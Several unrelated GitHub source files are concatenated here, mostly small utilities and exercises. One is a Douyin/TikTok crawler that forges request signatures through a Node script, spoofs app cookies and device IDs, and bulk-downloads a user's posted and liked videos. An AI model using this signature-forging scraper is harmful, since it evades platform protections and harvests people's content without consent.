print("Yes", das, end="")
else:
print("No", das, end="")
| harsh6754/DSA-Problems | leetcode/PrmeVilla.py | PrmeVilla.py | py | 728 | python | en | code | 1 | github-code | 90 |
41529537851 | # -*- coding: utf-8 -*-
# @Author : 李惠文
# @Email : 2689022897@qq.com
# @Time : 2020/7/3 10:58
# 抖音爬虫
import datetime
import os
import sys
import getopt
import urllib.parse
import urllib.request
import copy
import codecs
import requests
import re
from six.moves import queue as Queue
from threading import Thread
import json
import time
# 自定义请求头文件
HEADERS = {
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'zh-CN,zh;q=0.9',
'pragma': 'no-cache',
'Accept-Encoding': '',
'cache-control': 'no-cache',
'upgrade-insecure-requests': '1',
'user-agent': "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1",
}
# 下载超时时间
TIMEOUT = 10
# 重试下载次数
RETRY = 5
# 下载失败过多,视为爬虫失败,停止继续爬虫
RESULTS_VARIATION_RETRY = 5000
# 设置十条线程下载
THREADS = 10
# 是否爬取该用户“喜欢”的作品
DOWNLOAD_FAVORITE = False
# 通过content-length头获取远程文件大小
def getRemoteFileSize(url):
try:
request = urllib.request.Request(url)
request.get_method = lambda: 'HEAD'
response = urllib.request.urlopen(request)
response.read()
except urllib.error.HTTPError as e:
# 远程文件不存在
print(e.code)
print(e.read().decode("utf8"))
return 0
else:
fileSize = dict(response.headers).get('Content-Length', 0)
return int(fileSize)
# 下载文件
def download(medium_type, uri, medium_url, target_folder):
headers = copy.deepcopy(HEADERS)
file_name = uri.strip()
# 如果无名文件,则以“无名文件+时间”命名
if (not file_name):
now_time = str(datetime.datetime.now().strftime('%Y%m%d%H%M%S'))
file_name = "无名文件" + now_time
if medium_type == 'video':
file_name += '.mp4'
headers['user-agent'] = 'Aweme/63013 CFNetwork/978.0.7 Darwin/18.6.0'
elif medium_type == 'image':
file_name += '.jpg'
file_name = file_name.replace("/", "-")
else:
return
# 文件路径
file_path = os.path.join(target_folder, file_name)
# 判断是否存在文件
if os.path.isfile(file_path):
# 通过content-length头获取远程文件大小
remoteSize = getRemoteFileSize(medium_url)
# 本地已下载的文件大小
localSize = os.path.getsize(file_path)
if remoteSize == localSize:
return
print("Downloading %s from %s.\n" % (file_name, medium_url))
retry_times = 0
# 判断重试下载次数
while retry_times < RETRY:
try:
resp = requests.get(medium_url, headers=headers,
stream=True, timeout=TIMEOUT)
if resp.status_code == 403:
retry_times = RETRY
print("Access Denied when retrieve %s.\n" % medium_url)
raise Exception("Access Denied")
with open(file_path, 'wb') as fh:
for chunk in resp.iter_content(chunk_size=1024):
fh.write(chunk)
break
except:
pass
retry_times += 1
else:
try:
os.remove(file_path)
except OSError:
pass
print("Failed to retrieve %s from %s.\n" % (uri, medium_url))
time.sleep(1)
# 从“分享地址”中,获取跳转页面
def get_real_address(url):
if url.find('v.douyin.com') < 0:
return url
res = requests.get(url, headers=HEADERS, allow_redirects=False)
if res.status_code == 302:
long_url = res.headers['Location']
HEADERS['Referer'] = long_url
return long_url
return None
# 获取dytk,用于下个接口使用的字段
def get_dytk(url):
res = requests.get(url, headers=HEADERS)
if not res:
return None
# dytk = re.findall("dytk: '(.*)'", res.content.decode('utf-8'))
dytk = re.findall("dytk: '(.*)'", res.text)
if len(dytk):
return dytk[0]
return None
# 多线程下载
class DownloadWorker(Thread):
def __init__(self, queue):
Thread.__init__(self)
self.queue = queue
def run(self):
while True:
# 队列中获取需要下载的
medium_type, uri, download_url, target_folder = self.queue.get()
# 下载
download(medium_type, uri, download_url, target_folder)
# tase_done()的作用:只有消费者把队列所有的数据处理完毕,queue.join()才会停止阻塞
self.queue.task_done()
class CrawlerScheduler(object):
def __init__(self, items):
# 需下载的文件名:被重定向的地址列表
self.file_names = {}
for i in items:
# 从“分享地址”中,获取跳转页面
url = get_real_address(i)
if url:
self.file_names[re.findall(r'v.douyin.com/(\w+)', i)[-1]] = url
if len(self.file_names) > 0:
# 初始化线程队列
self.queue = Queue.Queue()
for x in range(THREADS):
# 线程下载
worker = DownloadWorker(self.queue)
# 子线程的daemon属性为False,主线程结束时会检测该子线程是否结束,如果该子线程还在运行,则主线程会等待它完成后再退出
# 子线程的daemon属性为True,主线程运行结束时不对这个子线程进行检查而直接退出
worker.daemon = True
worker.start() # 属性daemon的值默认为False,如果需要修改,必须在调用start()方法启动线程之前进行设置
# 下载分析
self.scheduling()
# 调用js获取Signature
@staticmethod
def generateSignature(value):
p = os.popen('node fuck-byted-acrawler.js %s' % value)
return (p.readlines()[0]).strip()
# 下载分析
def scheduling(self):
for key, val in self.file_names.items():
# 用户全作品
if re.search('share/user', val):
self.download_user_videos(key, val)
# 挑战视频
elif re.search('share/challenge', val):
self.download_challenge_videos(key, val)
# 音乐
elif re.search('share/music', val):
self.download_music_videos(key, val)
# 分享单个视频
elif re.search('share/video', val):
self.download_share_videos(key, val)
# 截取视频id,下载分享视频
def download_share_videos(self, file_name, url):
item_ids = re.findall(r'share/video/(\d+)', url)
if not len(item_ids):
print("Share video #%s does not exist" % item_ids[0])
return
# 筛选视频id
item_id = item_ids[0]
video_count = self._download_share_videos_media(item_id, url, file_name)
# main线程等到其他多个线程执行完毕后再继续执行
self.queue.join()
print("\nItem share video #%s, video number %d\n\n" %
(item_id, video_count))
print("\nFinish Downloading All the videos from #%s\n\n" % item_id)
# 下载单个分享视频(添加至队列)
def _download_share_videos_media(self, item_id, url, file_name):
# 创建下载文件夹
current_folder = os.getcwd()
target_folder = os.path.join(current_folder, 'download/%s' % file_name)
if not os.path.isdir(target_folder):
os.mkdir(target_folder)
hostname = urllib.parse.urlparse(url).hostname
signature = self.generateSignature(str(item_id))
url = "https://%s/web/api/v2/aweme/iteminfo/?{0}" % hostname
params = {
'item_ids': str(item_id),
'count': '9',
'cursor': '0',
'aid': '1128',
'screen_limit': '3',
'download_click_limit': '0',
'_signature': signature
}
video_count = 0
# 获取下载列表
res = self.requestWebApi(url, params)
if res:
item_list = res.get('item_list', [])
if item_list:
for aweme in item_list:
aweme['hostname'] = hostname
video_count += 1
# 添加下载地址到队列
self._join_download_queue(aweme, target_folder)
return video_count
# 下载用户全作品
def download_user_videos(self, file_name, url):
# 获取用户id
number = re.findall(r'share/user/(\d+)', url)
if not len(number):
return
user_id = number[0]
# 获取dytk,用于下个接口使用的字段
dytk = get_dytk(f"https://www.amemv.com/share/user/{user_id}")
# 下载
video_count = self._download_user_media(user_id, dytk, url, file_name)
# main线程等到其他多个线程执行完毕后再继续执行
self.queue.join()
print("\nAweme number %s, video number %s\n\n" %
(user_id, str(video_count)))
print("\nFinish Downloading All the videos from %s\n\n" % user_id)
# 下载“分享的挑战视频”
def download_challenge_videos(self, file_name, url):
challenge = re.findall('share/challenge/(\d+)', url)
if not len(challenge):
print("Challenge #%s does not exist" % challenge[0])
return
# 获取挑战视频id
challenges_id = challenge[0]
video_count = self._download_challenge_media(challenges_id, url, file_name)
# main线程等到其他多个线程执行完毕后再继续执行
self.queue.join()
print("\nAweme challenge #%s, video number %d\n\n" %
(challenges_id, video_count))
print("\nFinish Downloading All the videos from #%s\n\n" % challenges_id)
# 下载“分享的音乐”
def download_music_videos(self, file_name, url):
music = re.findall('share/music/(\d+)', url)
if not len(music):
return
# 获取音乐id
musics_id = music[0]
video_count = self._download_music_media(musics_id, url, file_name)
# main线程等到其他多个线程执行完毕后再继续执行
self.queue.join()
print("\nAweme music @%s, video number %d\n\n" %
(musics_id, video_count))
print("\nFinish Downloading All the videos from @%s\n\n" % musics_id)
# 添加下载地址到队列
def _join_download_queue(self,aweme, target_folder):
try:
if aweme.get('video', None):
uri = aweme['video']['play_addr']['uri']
download_url = "https://aweme.snssdk.com/aweme/v1/play/?{0}"
download_params = {
'video_id': uri,
'line': '0',
'ratio': '720p',
'media_type': '4',
'vr_type': '0',
'improve_bitrate': '0',
'is_play_url': '1',
'h265': '1',
'adapt720': '1'
}
if aweme.get('hostname') == 't.tiktok.com':
download_url = 'http://api.tiktokv.com/aweme/v1/play/?{0}'
download_params = {
'video_id': uri,
'line': '0',
'ratio': '720p',
'media_type': '4',
'vr_type': '0',
'test_cdn': 'None',
'improve_bitrate': '0',
'version_code': '1.7.2',
'language': 'en',
'app_name': 'trill',
'vid': 'D7B3981F-DD46-45A1-A97E-428B90096C3E',
'app_version': '1.7.2',
'device_id': '6619780206485964289',
'channel': 'App Store',
'mcc_mnc': '',
'tz_offset': '28800'
}
url = download_url.format('&'.join([key + '=' + download_params[key] for key in download_params]))
self.queue.put(('video', aweme.get('desc', uri), url, target_folder))
else:
if aweme.get('image_infos', None):
image = aweme['image_infos']['label_large']
self.queue.put(('image', image['uri'], image['url_list'][0], target_folder))
except KeyError:
return
except UnicodeDecodeError:
print("Cannot decode response data from DESC %s" % aweme['desc'])
return
# 爬取该用户“喜欢”的作品(添加至队列)
def __download_favorite_media(self, user_id, dytk, hostname, signature, favorite_folder, video_count):
if not os.path.exists(favorite_folder):
os.makedirs(favorite_folder)
url = "https://%s/web/api/v2/aweme/like/" % hostname
params = {
'user_id': str(user_id),
'count': '21',
'max_cursor': '0',
'aid': '1128',
'_signature': signature,
'dytk': dytk
}
max_cursor = None
while True:
if max_cursor:
params['max_cursor'] = str(max_cursor)
# 获取下载列表
res = self.requestWebApi(url, params)
if not res:
# res = self.requestWebApi(url, params)
continue
favorite_list = res.get('aweme_list', [])
for aweme in favorite_list:
video_count += 1
aweme['hostname'] = hostname
# 添加下载地址到队列
self._join_download_queue(aweme, favorite_folder)
if not res.get('has_more'):
break
max_cursor = res.get('max_cursor')
return video_count
# 下载所有作品(添加至队列)
def _download_user_media(self, user_id, dytk, url, file_name):
# 新建文件夹
current_folder = os.getcwd()
target_folder = os.path.join(current_folder, 'download/%s' % file_name)
if not os.path.isdir(target_folder):
os.mkdir(target_folder)
# 判断之前是否user_id是否获取了
if not user_id:
print("Number %s does not exist" % user_id)
return
# 首次判断是否无视频,hostname可以理解为该用户的id,下面请求有用
hostname = urllib.parse.urlparse(url).hostname
if hostname != 't.tiktok.com' and not dytk:
print(url, "已无视频可以爬")
return
# 获取signature
signature = self.generateSignature(str(user_id))
url = "https://%s/web/api/v2/aweme/post/" % hostname
# 爬取第一页,每页21个视频
params = {
'user_id': str(user_id),
'count': '21',
'max_cursor': '0',
'aid': '1128',
'_signature': signature,
'dytk': dytk
}
# if hostname == 't.tiktok.com':
# params.pop('dytk')
# params['aid'] = '1180'
# 分页
# max_cursor 上一个max_cursor是下一次请求的参数,可以理解为上一个爬取视频的最后一个视频序号吧
# video_count 爬取视频总数
max_cursor, video_count = None, 0
retry_count = 0
while True:
if max_cursor:
params['max_cursor'] = str(max_cursor)
# 获取下载列表
res = self.requestWebApi(url, params)
if not res:
break
aweme_list = res.get('aweme_list', [])
for aweme in aweme_list:
video_count += 1
aweme['hostname'] = hostname
# 添加下载地址到队列
self._join_download_queue(aweme, target_folder)
# has_more:是否没有视频了
if not res.get('has_more'):
break
max_cursor = res.get('max_cursor')
# TODO: Weird result. What went wrong?
# 下载过程中爬虫失败判断
if not max_cursor:
retry_count += 1
params['_signature'] = self.generateSignature(str(user_id))
# 下载失败过多,视为爬虫失败,停止继续爬虫
if retry_count > RESULTS_VARIATION_RETRY:
print('download user media: %s, Too many failures!' %
str(user_id))
break
print('download user media: %s, result retry: %d.' %
(str(user_id), retry_count,))
# 是否爬取该用户“喜欢”的作品
if DOWNLOAD_FAVORITE:
favorite_folder = target_folder + '/favorite'
video_count = self.__download_favorite_media(
user_id, dytk, hostname, signature, favorite_folder, video_count)
if video_count == 0:
print("There's no video in number %s." % user_id)
# 返回总共下载的视频总量
return video_count
# 下载挑战视频(添加至队列)
def _download_challenge_media(self, challenge_id, url, file_name):
# 创建下载文件夹
current_folder = os.getcwd()
target_folder = os.path.join(
current_folder, 'download/#%s' % file_name)
if not os.path.isdir(target_folder):
os.mkdir(target_folder)
hostname = urllib.parse.urlparse(url).hostname
signature = self.generateSignature(str(challenge_id) + '9' + '0')
url = "https://%s/aweme/v1/challenge/aweme/" % hostname
params = {
'ch_id': str(challenge_id),
'count': '9',
'cursor': '0',
'aid': '1128',
'screen_limit': '3',
'download_click_limit': '0',
'_signature': signature
}
cursor, video_count = None, 0
while True:
if cursor:
params['cursor'] = str(cursor)
params['_signature'] = self.generateSignature(
str(challenge_id) + '9' + str(cursor))
# 获取下载列表
res = self.requestWebApi(url, params)
if not res:
break
aweme_list = res.get('aweme_list', [])
if not aweme_list:
break
for aweme in aweme_list:
aweme['hostname'] = hostname
video_count += 1
# 添加下载地址到队列
self._join_download_queue(aweme, target_folder)
if res.get('has_more'):
cursor = res.get('cursor')
else:
break
if video_count == 0:
print("There's no video in challenge %s." % challenge_id)
return video_count
# 下载音乐(添加至队列)
def _download_music_media(self, music_id, url, file_name):
if not music_id:
print("Challenge #%s does not exist" % music_id)
return
# 创建下载文件夹,音乐文件夹名字,前头带“@”,用于区别
current_folder = os.getcwd()
target_folder = os.path.join(current_folder, 'download/@%s' % file_name)
if not os.path.isdir(target_folder):
os.mkdir(target_folder)
hostname = urllib.parse.urlparse(url).hostname
signature = self.generateSignature(str(music_id))
url = "https://%s/web/api/v2/music/list/aweme/?{0}" % hostname
params = {
'music_id': str(music_id),
'count': '9',
'cursor': '0',
'aid': '1128',
'screen_limit': '3',
'download_click_limit': '0',
'_signature': signature
}
if hostname == 't.tiktok.com':
for key in ['screen_limit', 'download_click_limit', '_signature']:
params.pop(key)
params['aid'] = '1180'
cursor, video_count = None, 0
while True:
if cursor:
params['cursor'] = str(cursor)
params['_signature'] = self.generateSignature(
str(music_id) + '9' + str(cursor))
# 获取下载列表
res = self.requestWebApi(url, params)
if not res:
break
aweme_list = res.get('aweme_list', [])
if not aweme_list:
break
for aweme in aweme_list:
aweme['hostname'] = hostname
video_count += 1
# 添加下载地址到队列
self._join_download_queue(aweme, target_folder)
if res.get('has_more'):
cursor = res.get('cursor')
else:
break
if video_count == 0:
print("There's no video in music %s." % music_id)
return video_count
# 获取下载列表
def requestWebApi(self, url, params):
headers = copy.deepcopy(HEADERS)
headers['cookie'] = '_ga=GA1.2.1280899533.15586873031; _gid=GA1.2.2142818962.1559528881'
res = requests.get(url, headers=headers, params=params)
content = res.content.decode('utf-8')
print(content)
if not content:
print('\n\nWeb Api Error: %s'
'\n\nhears: %s'
'\n\nparams: %s' % (url, str(headers), str(params),))
return None
return json.loads(content)
def usage():
print("1. Please create file share-url.txt under this same directory.\n"
"2. In share-url.txt, you can specify amemv share page url separated by "
"comma/space/tab/CR. Accept multiple lines of text\n"
"3. Save the file and retry.\n\n"
"Sample File Content:\nurl1,url2\n\n"
"Or use command line options:\n\n"
"Sample:\npython amemv-video-ripper.py --urls url1,url2\n\n\n")
print(u"未找到share-url.txt文件,请创建.\n"
u"请在文件中指定抖音分享页面URL,并以 逗号/空格/tab/表格鍵/回车符 分割,支持多行.\n"
u"保存文件并重试.\n\n"
u"例子: url1,url12\n\n"
u"或者直接使用命令行参数指定链接\n"
u"例子: python amemv-video-ripper.py --urls url1,url2")
# 获取“分享地址”
# 找到一个文字编辑器,然后打开文件share-url.txt
# 把你想要下载的抖音号分享链接编辑进去,以逗号/空格/tab/表格鍵/回车符分隔,可以多行.例如, 这个文件看起来是这样的:
def parse_sites(fileName):
with open(fileName, "rb") as f:
txt = f.read().rstrip().lstrip()
txt = codecs.decode(txt, 'utf-8')
txt = txt.replace("\t", ",").replace(
"\r", ",").replace("\n", ",").replace(" ", ",")
txt = txt.split(",")
numbers = list()
for raw_site in txt:
site = raw_site.lstrip().rstrip()
if site:
numbers.append(site)
return numbers
# 获取“分享地址”的文件路径
def get_content(filename):
if os.path.exists(filename):
return parse_sites(filename)
else:
# 无法调出地址
usage()
sys.exit(1)
if __name__ == "__main__":
content, opts, args = None, None, []
try:
# getopt.getopt()为了从外部输入不同的命令行选项时,对应执行不同的功能
opts, args = getopt.getopt(sys.argv[1:], "hi:o:", ["favorite", "urls=", "filename="])
except getopt.GetoptError:
# 无法调出地址
usage()
# sys.exit([args])的参数解析
# 意思就是参数为数字的时候,和 shell 退出码意义是一样的,sys.exit(2)和sys.exit(1)只是为了区分结束原因
# 0 :成功结束
# 1 :通用错误
# 2 :误用Shell命令
sys.exit(2)
# 命令行中提取地址到content
for opt, arg in opts:
if opt == "--favorite":
DOWNLOAD_FAVORITE = True
elif opt == "--urls":
content = arg.split(",")
elif opt == "--filename":
content = get_content(arg)
# 从文件中提取下载地址到content
if content == None:
# 找到一个文字编辑器,然后打开文件share-url.txt
content = get_content("share-url.txt")
# 没有需要下载就关闭
if len(content) == 0 or content[0] == "":
# 无法调出地址
usage()
sys.exit(1)
# 执行下载程序
CrawlerScheduler(content)
| NearHuiwen/TiktokCrawler | amemv-video-ripper.py | amemv-video-ripper.py | py | 24,868 | python | en | code | 43 | github-code | 90 |
27665823847 |
class MultiResultSet(object):
def __init__(self, entities):
self._entities = entities
self.raw = None
self.measurement = ""
def update(self, measurement, data):
self.measurement = measurement
self.raw = data.copy()
for k, v in self.raw.items():
if v:
self.__setattr__(str(k), v)
| museghost/influxalchemy | influxalchemy/resultset.py | resultset.py | py | 365 | python | en | code | null | github-code | 90 |
44669472709 | import random
x = int(random.randrange(5,100))
print(x)
hak = int(input("Kaç Hakkınızın OLmasını İstersiniz :"))
if hak>5:
print("5 den daha hazla hak a sahip olmazsınız.")
while hak >5:
hak = int(input("Kaç Hakkınızın OLmasını İstersiniz :"))
a = 0
while hak >0:
a = int(input("Lutfen bir sayi giriniz : "))
if a<x:
print("Girdiginiz sayidan daha B Ü Y Ü K bir deger giriniz!")
elif a==x :
print(f"Tebrikler Buldunuz sayi {x}")
break
else:
print("Girdiginiz sayidan daha K Ü Ç Ü K bir deger giriniz")
hak-= 1
if hak ==0 and a!=x:
print("Ne yazık ki oyunu kaybettiniz->")
p =(5-hak)*20
print(f"Tolam Puanınız ({p}")
| osmanozden/basic_python_fundamental | loops_MY_FİRS_GAME.py | loops_MY_FİRS_GAME.py | py | 718 | python | tr | code | 0 | github-code | 90 |
37845781990 | import numpy as np
import pandas as pd
import re
import sqlite3
# import data from csv file
df1 = pd.read_csv('sample.csv')
# pre-processing
df1.drop(columns=['Sticker taps', 'Content type', 'Replies', 'Results', 'Cost per result'], inplace=True)
# df1['Post time'] = pd.to_datetime(df1['Post time'])
df1 = df1.loc[df1['Caption'] != '***** updated their cover photo.'].reset_index(drop=True)
df1.insert(loc=0, column='postID', value=range(1, len(df1) + 1))
df1 = df1.reset_index(drop=True)
df1['postID'] = df1['postID'].astype(str)
# create a DataFrame for each table in a database file
dict_df2 = {'tagID':[], 'campaigns':[]}
dict_df3 = {'pk_postsAndTags':[], 'postID':[], 'tagID':[]}
# dict_df4 = {'tagID':[], 'courseName':[]}
# dict_df5 = {'customerID':[], ...}
# extract tags from Caption (exclude Thai language)
# indicate regular expression
pattern = re.compile('#[a-zA-Z0-9]+[\w$]') # indicate REGEX for retrieve tags
# Extract tags for each post into a new table
for index, row in df1.iterrows(): # find tags for each post (each row)
result = pattern.findall(df1['Caption'][index]) # get tags from a comment column and get into a list
lower_result = [e.lower() for e in result] # lowering case tags to make it consistent
lower_result_remove_duplicate = list(set(lower_result)) # remove duplicated tags for each post
if len(lower_result_remove_duplicate) != 0: # if post contains any tag
# lower_result is a list containing tags for each post; [#tag1, #tag2, #tag3, ...]
for e in lower_result_remove_duplicate: # for each tag in a post
if e not in dict_df2['campaigns']: # if tag is not in record before, record it as a new one
tag_id = len(dict_df2['tagID'])+1
dict_df2['tagID'].append(str(tag_id))
dict_df2['campaigns'].append(e)
# define elements before inserting it to be the data
postid = df1['postID'][index]
i = dict_df2['campaigns'].index(e)
tagid = dict_df2['tagID'][i]
temp_tuple = str(tuple([postid, tagid]))
# insert elements to be the data
dict_df3['pk_postsAndTags'].append(temp_tuple)
dict_df3['postID'].append(postid)
dict_df3['tagID'].append(tagid)
df2 = pd.DataFrame(dict_df2)
df3 = pd.DataFrame(dict_df3)
# export as a database file
connection = sqlite3.connect('sample.db')
# define a function for query execution
def execute_query(connection, query):
cursor = connection.cursor()
try:
cursor.execute(query)
connection.commit()
print("Query successful")
except OSError as err:
print(f"Error: '{err}'")
def insert_row(connection, query, row):
cursor = connection.cursor()
try:
cursor.execute(query, row)
connection.commit()
print("Query successful")
except OSError as err:
print(f"Error: '{err}'")
# the database will consist of 3 tables; posts, postAndTags, campaigns
# create tables in database
query1_1 = '''
CREATE TABLE IF NOT EXISTS posts (
postID TEXT,
postTime TEXT, -- need to be transformed to DATETIME later
caption TEXT,
reach INT,
likesAndReactions INT,
postClicks INT,
comments INT,
shares INT,
PRIMARY KEY (postID)
);
'''
query2_1 = '''
CREATE TABLE IF NOT EXISTS campaigns (
tagID TEXT,
campaign TEXT,
PRIMARY KEY (tagID)
);
'''
# Bridge table
query3_1 = '''
CREATE TABLE IF NOT EXISTS postsAndTags (
pk_postsAndTags TEXT,
postID TEXT REFERENCES posts(postID),
tagID TEXT REFERENCES campaigns(tagID),
PRIMARY KEY (pk_postsAndTags)
);
'''
# query4 =
execute_query(connection, query1_1)
execute_query(connection, query2_1)
execute_query(connection, query3_1)
# insert data into tables
query1_2 = '''
INSERT INTO posts (postID, postTime, caption, reach, likesAndReactions, postClicks, comments, shares)
VALUES (?, ?, ?, ?, ?, ?, ?, ?);
'''
query2_2 = '''
INSERT INTO campaigns (tagID, campaign)
VALUES (?, ?);
'''
query3_2 = '''
INSERT INTO postsAndTags (pk_postsAndTags, postID, tagID)
VALUES (?, ?, ?);
'''
for index, row in df1.iterrows():
insert_row(connection, query1_2, tuple(row))
for index, row in df2.iterrows():
insert_row(connection, query2_2, tuple(row))
for index, row in df3.iterrows():
insert_row(connection, query3_2, tuple(row))
connection.close() | Patcharanat/Marketing-Dashboard | marketing_dashboard_script.py | marketing_dashboard_script.py | py | 4,454 | python | en | code | 1 | github-code | 90 |
24333941495 | import logging
from .analyzer import Analyzer
from ..matrix.geomatrix import GeoMatrix, PersistentGeoMatrix
L = logging.getLogger(__name__)
class GeoAnalyzer(Analyzer):
'''
This is the analyzer for events with geographical points dimension.
`GeoAnalyzer` operates over the `GeoMatrix` object.
`matrix_id` is an id of `GeoMatrix` object defined alternatively.
'''
ConfigDefaults = {
"max_lat": 71.26, # Europe endpoints
"min_lat": 23.33,
"min_lon": -10.10,
"max_lon": 40.6,
}
def __init__(self, app, pipeline, matrix_id=None, dtype="float_", analyze_on_clock=False, bbox=None, resolution=5, persistent=False, id=None, config=None):
super().__init__(app, pipeline, analyze_on_clock=analyze_on_clock, id=id, config=config)
svc = app.get_service("bspump.PumpService")
if matrix_id is None:
g_id = self.Id + "Matrix"
if bbox is None:
bbox = {
"min_lat": float(self.ConfigDefaults["min_lat"]),
"max_lat": float(self.ConfigDefaults["max_lat"]),
"min_lon": float(self.ConfigDefaults["min_lon"]),
"max_lon": float(self.ConfigDefaults["max_lon"]),
}
if persistent:
self.GeoMatrix = PersistentGeoMatrix(app, dtype, bbox=bbox, resolution=resolution, id=g_id, config=config)
else:
self.GeoMatrix = GeoMatrix(app, dtype, bbox=bbox, resolution=resolution, id=g_id, config=config)
svc.add_matrix(self.GeoMatrix)
else:
self.GeoMatrix = svc.locate_matrix(matrix_id)
| pypi-buildability-project/BitSwanPump | bspump/analyzer/geoanalyzer.py | geoanalyzer.py | py | 1,438 | python | en | code | null | github-code | 90 |
40746228755 | import re
class CatalPhoto(object):
"""Represents a photo in the Catalhoyuk archive."""
# Regex for extracting record ID from a URL
record_id_re = re.compile(r'(original|preview)=(\d+)', flags=re.IGNORECASE)
def __init__(self, url, annotation=None):
self.url = str(url)
self.record_id = int(self.record_id_re.search(url).group(2))
if annotation is not None:
self.is_labeled = True
self.has_whiteboard = annotation.lower().startswith('y')
self.is_difficult = annotation != 'y' and annotation != 'n'
else:
self.is_labeled = False
| chrischute/catal | catal/catal_photo.py | catal_photo.py | py | 629 | python | en | code | 0 | github-code | 90 |
17419482192 |
import os, pprint
from krrt.utils import get_file_list, write_file
from data import *
forbidden_files = ['__init__', 'api.py']
def get_name(dom):
suffixes = ['-sat', '-opt', '-strips', '-fulladl', '-06', '-08', '-00', '-02', '98', '00', '-simpleadl', '-adl']
name = dom.split('/')[-1]
for s in suffixes:
name = name.split(s)[0]
#if '-' in name:
# print "Check name: %s" % name
if '' == name:
print ("Error: empty name from %s" % dom)
return name
def handle_single(dom):
towrite = 'domains = [\n'
extra_domain = False
domdata = {}
domdata['name'] = get_name(dom)
domdata['description'] = domain_description[get_name(dom)]
# Special Cases:
# IPC-2000: freecell (non-pfiles)
# IPC-2002: satellite (p#-pfile#.pddl)
# IPC-2002: freecell (pfile#)
if './freecell' == dom:
extra_domain = True
domdata['problems'] = [((dom+'/domain.pddl')[2:], prob[2:]) for prob in sorted(get_file_list(dom, forbidden_list=forbidden_files+['pfile','/domain.pddl']))]
domdata['ipc'] = '2000'
domdata2 = {}
domdata2['name'] = domdata['name']
domdata2['description'] = domain_description[get_name(dom)]
domdata2['problems'] = [((dom+'/domain.pddl')[2:], prob[2:]) for prob in sorted(get_file_list(dom, forbidden_list=forbidden_files+['/domain.pddl'], match_list=['pfile']))]
domdata2['ipc'] = '2002'
elif './satellite' == dom:
extra_domain = True
domdata['problems'] = [((dom+'/domain.pddl')[2:], prob[2:]) for prob in sorted(get_file_list(dom, forbidden_list=forbidden_files+['/domain.pddl']))]
domdata['ipc'] = ipc_map.get(dom[2:])
domdata2 = {}
domdata2['name'] = domdata['name']
domdata2['description'] = domain_description[get_name(dom)]
domdata2['problems'] = [((dom+'/domain.pddl')[2:], prob[2:]) for prob in sorted(get_file_list(dom, forbidden_list=forbidden_files+['/domain.pddl','-HC-']))]
domdata2['ipc'] = '2002'
else:
domdata['problems'] = [((dom+'/domain.pddl')[2:], prob[2:]) for prob in sorted(get_file_list(dom, forbidden_list=forbidden_files+['/domain.pddl','/domain-nosplit.pddl','/orig-domain.pddl']))]
domdata['ipc'] = ipc_map.get(dom[2:])
towrite += pprint.pformat(domdata)
if extra_domain:
towrite += ',\n'
towrite += pprint.pformat(domdata2)
towrite += '\n]'
#print "To be printed:\n-------"
#print towrite
#print "-------\n"
print ("Handling single domain: %s" % dom)
write_file(dom+'/api.py', towrite)
def handle_double(dom):
towrite = 'domains = [\n'
domdata = {}
domdata['name'] = get_name(dom)
domdata['description'] = domain_description[get_name(dom)]
domfiles = get_file_list(dom, match_list=['domain'], forbidden_list=forbidden_files)
prbfiles = get_file_list(dom, forbidden_list=forbidden_files+['domain'])
if len(domfiles) == len(prbfiles):
def remdom(dom):
toret = dom
for s in ['-domain', 'domain_']:
toret = ''.join(toret.split(s))
return toret
dmap = {remdom(d): d for d in domfiles}
if all([k in prbfiles for k in dmap]):
print ("Handling multi-domain: %s" % dom)
assert len(set(dmap.keys())) == len(set(prbfiles))
domdata['problems'] = [(dmap[prob][2:], prob[2:]) for prob in sorted(prbfiles)]
domdata['ipc'] = ipc_map.get(dom[2:])
elif dom in ['./psr-small', './airport']:
print ("Handling custom 50-problem domain: %s" % dom)
assert 100 == len(get_file_list(dom, match_list=['pddl'], forbidden_list=forbidden_files))
probs = []
for i in range(1,51):
d = get_file_list(dom, match_list=["p%02d-domain" % i], forbidden_list=forbidden_files)
p = get_file_list(dom, match_list=["p%02d-" % i], forbidden_list=forbidden_files+['domain'])
assert 1 == len(d), str(d)
assert 1 == len(p), str(p)
probs.append((d[0][2:], p[0][2:]))
domdata['problems'] = sorted(probs)
domdata['ipc'] = ipc_map.get(dom[2:])
else:
print ("Unhandled balanced multi-domain: %s" % dom)
return
else:
print ("Unhandled lopsided multi-domain: %s" % dom)
towrite += pprint.pformat(domdata)
towrite += '\n]'
#print "To be printed:\n-------"
#print towrite
#print "-------\n"
write_file(dom+'/api.py', towrite)
domains = get_file_list('.', forbidden_list=['.py'])
single_dom = []
multi_dom = []
done_dom = []
print
for dom in domains:
if os.path.isfile(dom+'/api.py'):
done_dom.append(dom)
else:
if os.path.isfile(dom+'/domain.pddl'):
single_dom.append(dom)
for i in get_file_list(dom, forbidden_list=forbidden_files+['/domain.pddl']):
if 'dom' in i.split('/')[-1]:
print ("Warning: Double domain in %s must be handled." % dom)
else:
multi_dom.append(dom)
os.system("touch %s/__init__.py" % dom)
print ("\nSingle doms: %d" % len(single_dom))
print (map(get_name, single_dom))
print ("\nMulti doms: %d" % len(multi_dom))
print (map(get_name, multi_dom))
print ("\nDone doms: %d" % len(done_dom))
print (map(get_name, done_dom))
print ()
for ipc in ipcs:
for dom in ipc:
if not os.path.isdir('./'+dom):
print ("Bad dom: %s" % dom)
for dom in single_dom:
handle_single(dom)
for dom in multi_dom:
handle_double(dom)
print
| AI-Planning/api-tools | scripts/formalism-initialization/classical/create-meta.py | create-meta.py | py | 5,643 | python | en | code | 11 | github-code | 90 |
7568317516 | # -*- coding: utf-8 -*-
"""
Assignment 5 problem 3
Computes the total energy per unit area
radiated by a blackbody by computing the integral
I=\int_0^\infty \frac{x^3}{\exp{x}-1} dx multiplied
by a constant. Analytically this integral may in fact be evaluated exactly,
using the Riemann zeta and Gamma functions. Using the value for the integral
we can estimate the Stefan Boltzmann constant, which has the approximate
value \sigma ~ 5.670373(21)e-8 W m^-2 K^-4. We use Gaussian quadrature to
compute the integral.
"""
from math import exp,fabs
from numpy import ones,copy,cos,tan,pi,linspace
def gaussxw(N):
# Initial approximation to roots of the Legendre polynomial
a = linspace(3,4*N-1,N)/(4*N+2)
x = cos(pi*a+1/(8*N*N*tan(a)))
# Find roots using Newton's method
epsilon = 1e-15
delta = 1.0
while delta>epsilon:
p0 = ones(N,float)
p1 = copy(x)
